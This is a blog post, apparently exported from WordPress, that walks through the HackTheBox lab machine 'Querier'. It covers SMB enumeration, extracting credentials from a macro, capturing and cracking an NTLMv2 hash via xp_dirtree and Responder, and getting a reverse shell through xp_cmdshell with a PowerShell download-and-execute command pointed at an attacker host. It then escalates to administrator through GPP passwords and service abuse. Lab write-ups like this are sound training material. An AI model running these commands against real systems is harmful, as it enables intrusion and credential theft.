{"id":336,"date":"2020-07-07T17:54:34","date_gmt":"2020-07-07T17:54:34","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=336"},"modified":"2020-07-07T17:54:39","modified_gmt":"2020-07-07T17:54:39","slug":"querier-hackthebox-walkthrough","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/querier-hackthebox-walkthrough\/","title":{"rendered":"Querier: Hackthebox walkthrough"},"content":{"rendered":"\n

Hello Everyone!! In this post we will see how to pwn Querier<\/strong> from hackthebox<\/strong>.\u00a0<\/p>\n\n\n\n

Summary<\/h2>\n\n\n\n

Querier is a medium windows machine<\/strong>. The initial foothold requires to enumerate the smb shares<\/strong> to obtain the password for a user, reporting who can log in in to the mssql-server<\/strong>. To get the user on the system, we can steal the hash of mssql-svc<\/strong> user by running xp_dirtree<\/strong> command. Privilege escalation to the administrator is pretty straight forward as the box stores the administrator creds in the GPP .XML files.<\/p>\n\n\n\n

With all that being said, let\u2019s get started.<\/p>\n\n\n\n

Initial foothold<\/h2>\n\n\n\n

Running a nmap scan resulted in a lot of open ports. But this time port 80 wasn\u2019t present. So the only remaining point to start the enumeration was smb.<\/p>\n\n\n\n

# nmap -sC -sV -o querier.nmap 10.10.10.125\n\nNmap scan report for 10.10.10.125\nHost is up (0.27s latency).\nNot shown: 996 closed ports\nPORT STATE SERVICE \u00a0 VERSION\n135\/tcp\u00a0 open\u00a0 msrpc \u00a0 \u00a0 Microsoft Windows RPC\n139\/tcp\u00a0 open\u00a0 netbios-ssn \u00a0 Microsoft Windows netbios-ssn\n445\/tcp\u00a0 open\u00a0 microsoft-ds?\n1433\/tcp open\u00a0 ms-sql-s\u00a0 Microsoft SQL Server\u00a0 14.00.1000.00\n| ms-sql-ntlm-info:\n| \u00a0 Target_Name: HTB\n| \u00a0 NetBIOS_Domain_Name: HTB\n| \u00a0 NetBIOS_Computer_Name: QUERIER\n| \u00a0 DNS_Domain_Name: HTB.LOCAL\n| \u00a0 DNS_Computer_Name: QUERIER.HTB.LOCAL\n| \u00a0 DNS_Tree_Name: HTB.LOCAL\n|_\u00a0 Product_Version: 10.0.17763\n| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback\n| Not valid before: 2020-07-05T15:44:27\n|_Not valid after:\u00a0 2050-07-05T15:44:27\n|_ssl-date: 2020-07-05T15:45:28+00:00; +4m44s from scanner time.\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n|_clock-skew: mean: 4m44s, deviation: 0s, median: 4m43s\n| ms-sql-info:\n| \u00a0 10.10.10.125:1433:\n| Version:\n| \u00a0 name: Microsoft SQL Server\n| \u00a0 number: 14.00.1000.00\n| \u00a0 Product: Microsoft SQL Server\n|_ TCP port: 1433\n| smb2-security-mode:\n| \u00a0 2.02:\n|_ Message signing enabled but not required\n| smb2-time:\n| \u00a0 date: 2020-07-05 21:15:32\n|_\u00a0 start_date: N\/A\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sun Jul\u00a0 5 21:10:54 2020 -- 1 IP address (1 host up) scanned in 41.58 seconds<\/pre>\n\n\n\n
Meanwhile I started a full port scan as well<\/p>\n\n\n\n
# nmap -p-  -sV -A -T4 -vv 10.10.10.125 -o fullport.nmap<\/pre>\n\n\n\n
Listed all the shares with smbclient<\/p>\n\n\n\n
\u26a1 root@kali\u00a0 ~\/Desktop\/htb\/querier> master\u00a0 smbclient -L 10.10.10.125\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\nEnter WORKGROUP\\root's password:\n\n\u00a0\u00a0\u00a0\u00a0Sharename \u00a0 Type\u00a0 Comment\n\u00a0\u00a0\u00a0\u00a0--------- \u00a0 ----\u00a0 -------\n\u00a0\u00a0\u00a0\u00a0ADMIN$\u00a0 \u00a0 \u00a0 Disk\u00a0 Remote Admin\n\u00a0\u00a0\u00a0\u00a0C$\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Disk\u00a0 Default share\n\u00a0\u00a0\u00a0\u00a0IPC$\u00a0 \u00a0 \u00a0 \u00a0 IPC \u00a0 Remote IPC\n\u00a0\u00a0\u00a0\u00a0Reports \u00a0 \u00a0 Disk<\/pre>\n\n\n\n
Reports share seemed a custom one created so I listed its contents with smbmap<\/p>\n\n\n\n
# smbmap -R \u201cReports\u201d -H 10.10.10.125<\/pre>\n\n\n\n
\"\"\/
enumerating the contents of  Reports<\/figcaption><\/figure>\n\n\n\n
Downloaded the xlsm file with smbmap<\/p>\n\n\n\n
#smbmap -R \"Reports\"  -H 10.10.10.125 -A 'Currency Volume Report.xlsm'<\/pre>\n\n\n\n
If you are unaware of .xlsm extension, let me answer it for you.<\/p>\n\n\n\n
Files with XLSM<\/strong> extension is a type of Spreasheet files that support Macros. XLSM<\/strong> files are similar to XLM file formats but are based on the Open XML format introduced in Microsoft Office 2007. A macro is used to record the steps that are performed repeatedly and facilitates performing the actions by running the macro again. All the steps performed by the users are recorded and the process is termed macro recording. Macro recording generates VBA code in the form of a macro that can be edited using the Visual Basic Editor (VBE).<\/p>\n\n\n\n
There is a python package available that works with this extension. It can be installed with pip<\/p>\n\n\n\n
# pip install python-oletools<\/pre>\n\n\n\n
Under oletools, we have olevba<\/a><\/span><\/strong> that is used to extract and analyze VBA Macro source code from MS Office documents.<\/strong><\/p>\n\n\n\n
# olevba 10.10.10.125-Reports_Currency\\ Volume\\ Report.xlsm<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Username: Password -> reporting:PcwTWTHRwryjc$c6<\/strong><\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
In the output we can see that the olevba retrieved us the username and the password.<\/p>\n\n\n\n
So now lets try to login into the mssql server.<\/p>\n\n\n\n
Here the impacket script, mssqlclient.py<\/strong> can be used to login to the server. -windows-auth<\/strong> flag has to be explicitly specified as it is disabled by default.<\/p>\n\n\n\n
# mssqlclient.py reporting@10.10.10.125 -windows-auth<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
And we are logged in!!!<\/p>\n\n\n\n
Getting the user.txt<\/h2>\n\n\n\n
With reporting as user, we had minimal privileges. But the user can easily steal the hash of the service running. This can be done with xp_dirtree<\/strong>. It is a stored procedure that returns a list of every folder, every subfolder, and every file for path you give it. Here we can set the path to a fake share name that doesn’t even exist and start a responder on tun0. When the service tried to access the share, the responder will log the hash of service account.<\/p>\n\n\n\n
# xp_dirtree \u2018\\\\10.10.1415\\test\\\u2019<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
# responder -I tun0<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
The hash is of the type NTLMv2<\/strong>. We can find the mode of the hash inside hashcat example hashes and it comes out to be 5600.<\/strong><\/p>\n\n\n\n
# hashcat -m 5600 hash_sql \/usr\/share\/wordlists\/rockyou.txt --force<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
The username is mssql-svc<\/strong>(can be seen in the hash) password is corporate568<\/strong>. After trying these creds on mssqlclient.py, I got successfully logged in.\u00a0<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
This time the enable_xp_cmdshell<\/strong> was available for the user. With this command we can execute commands on the sql-server.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
We are now mssql-svc. <\/p>\n\n\n\n
Reverse shell<\/h2>\n\n\n\n
I used Invoke-PowerShellTcp.ps1<\/strong> from nishang<\/span><\/strong><\/a> scripts to obtain the reverse shell. Set up the nc listener and SimpleHTTPServer<\/strong> on port 80.<\/p>\n\n\n\n
Run the following command on the sql prompt<\/p>\n\n\n\n
> xp_cmdshell powershell IEX(New-Object Net.Webclient).downloadString(\\\"http:\/\/10.10.14.15\/rev.ps1\\\")<\/pre>\n\n\n\n
\"Got
Got shell as mssql-svc<\/figcaption><\/figure>\n\n\n\n
An we got the shell. Grab the user.txt<\/p>\n\n\n\n
Privilege escalation to administrator<\/h2>\n\n\n\n
Upload the PowerUp.ps1<\/span><\/a><\/strong> script from powersploit tools that\u2019s used to enumerate the box.<\/p>\n\n\n\n
# xp_cmdshell powershell IEX(New-Object Net.Webclient).downloadString(\\\"http:\/\/10.10.14.15\/PowerUp.ps1\\<\/a>\")<\/pre>\n\n\n\n
# Invoke-AllChecks<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
In the results of PowerUp enumeration, I found two routes that could lead us to administrator.\u00a0 First was abusing the usosvc service<\/strong> as we had the privilege to restart the service. I will show this route at the end of the blog.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
In the enumeration, I also found the GPP .xml files<\/strong> that directly returned the password of the administrator.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Administrator:MyUnclesAreMarioAndLuigi!!1!<\/strong><\/p>\n\n\n\n
I used these creds on impacket\u2019s psexec.py<\/span><\/a><\/strong> and got successfully logged in.<\/p>\n\n\n\n
# psexec.py administrator@10.10.10.125<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Box is pwned!!!<\/p>\n\n\n\n
Now the alternative!<\/h2>\n\n\n\n
Since we could abuse the usosvc service, I tried running<\/p>\n\n\n\n
# Invoke-ServiceAbuse -Name \u2018UsoSvc\u2019 -Command \u2018net user administrator hacked!!\u2019<\/pre>\n\n\n\n
This command will change the password of administrator to hacked!!<\/strong><\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Again, the creds can be used with psexec.py<\/strong> to obtain the shell as admin.<\/p>\n\n\n\n
Thats all for the blog post. Thanks for reading! For more such content subscribe to my page.<\/p>\n\n\n\n
See you in the next one!! Until then, happy hunting.<\/p>\n","protected":false},"excerpt":{"rendered":"
Querier is a medium level windows machine. It exploits the mssql-server running on the box. The privilege escalation to administrator exploits GPP xml files<\/p>\n","protected":false},"author":1,"featured_media":338,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[19,2,141],"tags":[213,26,120,210,209,216,219,215,208,211,217,212,113,214,218],"class_list":["post-336","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-information-security","category-linux","tag-gpp","tag-hackthebox","tag-impacket","tag-mssql-server","tag-mssql-svc","tag-mssqlclient-py","tag-nishang","tag-olevba","tag-querier-htb","tag-reporting","tag-responder","tag-shares","tag-smb","tag-xlsm","tag-xp_dirtree","entry","has-media"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/336"}],"collection":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/comments?post=336"}],"version-history":[{"count":2,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/336\/revisions"}],"predecessor-version":[{"id":339,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/336\/revisions\/339"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media\/338"}],"wp:attachment":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media?parent=336"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/categories?post=336"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/tags?post=336"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}